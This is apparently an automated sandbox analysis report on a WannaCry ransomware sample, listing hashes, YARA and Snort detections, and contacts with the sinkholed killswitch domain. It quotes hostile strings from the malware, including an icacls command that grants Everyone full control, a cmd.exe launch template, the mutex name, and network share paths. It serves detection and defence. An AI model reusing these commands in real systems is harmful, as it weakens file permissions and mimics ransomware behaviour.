
Windows Analysis Report
MSNRf9dZ63.exe

Overview

General Information

Sample Name: MSNRf9dZ63.exe
Analysis ID: 721108
MD5: 1d38638153085a0a0f0a4f7174e52a9b
SHA1: f0bb8179052451ac327e6fff048bc27c73bf7310
SHA256: 9678763f65e207dde99f4f8723ddfc44bc2d3f9b490aa3d3d4676c661474d59f

Detection

Wannacry
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • MSNRf9dZ63.exe (PID: 4548 cmdline: C:\Users\user\Desktop\MSNRf9dZ63.exe MD5: 1D38638153085A0A0F0A4F7174E52A9B)
    • tasksche.exe (PID: 5512 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)
  • MSNRf9dZ63.exe (PID: 4348 cmdline: C:\Users\user\Desktop\MSNRf9dZ63.exe -m security MD5: 1D38638153085A0A0F0A4F7174E52A9B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: MSNRf9dZ63.exe | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0x31f5a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x31f57c:$x3: tasksche.exe
  • 0x31f558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x31f5d0:$x5: WNcry@2ol7
  • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x31f5a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x31f4d0:$s3: cmd.exe /c "%s"
  • 0x351a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x312aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
Source: MSNRf9dZ63.exe | Rule: JoeSecurity_Wannacry | Description: Yara detected Wannacry ransomware | Author: Joe Security
Source: MSNRf9dZ63.exe | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0x31f57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x31f5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: MSNRf9dZ63.exe | Rule: Win32_Ransomware_WannaCry | Description: unknown | Author: ReversingLabs
  • 0x3120ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
  • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
  • 0x31785e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Source | Rule | Description | Author | Strings
Source: C:\Windows\tasksche.exe | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: C:\Windows\tasksche.exe | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: C:\Windows\tasksche.exe | Rule: Win32_Ransomware_WannaCry | Description: unknown | Author: ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Source | Rule | Description | Author | Strings
Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: 00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Wannacry | Description: Yara detected Wannacry ransomware | Author: Joe Security
Source: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Wannacry | Description: Yara detected Wannacry ransomware | Author: Joe Security
Source: 00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Wannacry | Description: Yara detected Wannacry ransomware | Author: Joe Security
Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source | Rule | Description | Author | Strings
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack | Rule: Win32_Ransomware_WannaCry | Description: unknown | Author: ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
No Sigma rule has matched

Snort IDS alerts

Timestamp: 10/12/22-06:23:13.693284
Source: 192.168.2.7:59477
Destination: 8.8.8.8:53
Protocol: UDP
SID: 2024291
Classtype: A Network Trojan was detected

Timestamp: 10/12/22-06:23:12.540467
Source: 104.16.173.80:80
Destination: 192.168.2.7:49699
Protocol: TCP
SID: 2031515
Classtype: Misc activity

Timestamp: 10/12/22-06:23:13.761402
Source: 192.168.2.7:49700
Destination: 104.16.173.80:80
Protocol: TCP
SID: 2024298
Classtype: A Network Trojan was detected

Timestamp: 10/12/22-06:23:12.511053
Source: 192.168.2.7:49699
Destination: 104.16.173.80:80
Protocol: TCP
SID: 2024298
Classtype: A Network Trojan was detected

Timestamp: 10/12/22-06:23:13.791210
Source: 104.16.173.80:80
Destination: 192.168.2.7:49700
Protocol: TCP
SID: 2031515
Classtype: Misc activity

AV Detection

Source: MSNRf9dZ63.exe | ReversingLabs: Detection: 96%
Source: MSNRf9dZ63.exe | Virustotal: Detection: 83%
Source: MSNRf9dZ63.exe | Avira: detected
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | URL Reputation: Label: malware
Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 15%
Source: C:\Windows\tasksche.exe | Avira: detection malicious, Label: TR/AD.WannaCry.sewvt
Source: C:\Windows\tasksche.exe | ReversingLabs: Detection: 97%
Source: C:\Windows\tasksche.exe | Metadefender: Detection: 88%
Source: MSNRf9dZ63.exe | Joe Sandbox ML: detected
Source: C:\Windows\tasksche.exe | Joe Sandbox ML: detected
Source: 2.2.tasksche.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 2.0.tasksche.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack | Avira: Label: TR/AD.WannaCry.sewvt
Source: C:\Windows\tasksche.exe | Code function: 2_2_004018B9 CryptReleaseContext, 2_2_004018B9
Source: MSNRf9dZ63.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Networking

Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK, Date: Wed, 12 Oct 2022 04:23:12 GMT, Content-Type: text/html, Content-Length: 607, Connection: close, Server: cloudflare, CF-RAY: 758d0f0f39c49b9e-FRA, Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK, Date: Wed, 12 Oct 2022 04:23:13 GMT, Content-Type: text/html, Content-Length: 607, Connection: close, Server: cloudflare, CF-RAY: 758d0f17080b9a15-FRA, Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: Traffic | Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:59477 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49699 -> 104.16.173.80:80
Source: Traffic | Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49699
Source: Traffic | Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49700 -> 104.16.173.80:80
Source: Traffic | Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49700
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.16.173.80 104.16.173.80
Source: Joe Sandbox View | IP Address: 104.16.173.80 104.16.173.80
Source: MSNRf9dZ63.exe | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, MSNRf9dZ63.exe, 00000001.00000002.254768785.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
Source: MSNRf9dZ63.exe, 00000001.00000002.254593327.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0
Source: MSNRf9dZ63.exe, 00000001.00000002.252440796.000000000019C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.kryptoslogic.com
Source: unknown | DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1, Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, Cache-Control: no-cache

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\tasksche.exe | Code function: CreateFileA, GetFileSizeEx, memcmp, GlobalAlloc, _local_unwind2, WANACRY! 2_2_004014A6
Source: Yara match | File source: MSNRf9dZ63.exe, type: SAMPLE
Source: Yara match | File source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSNRf9dZ63.exe PID: 4548, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSNRf9dZ63.exe PID: 4348, type: MEMORYSTR

System Summary

Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
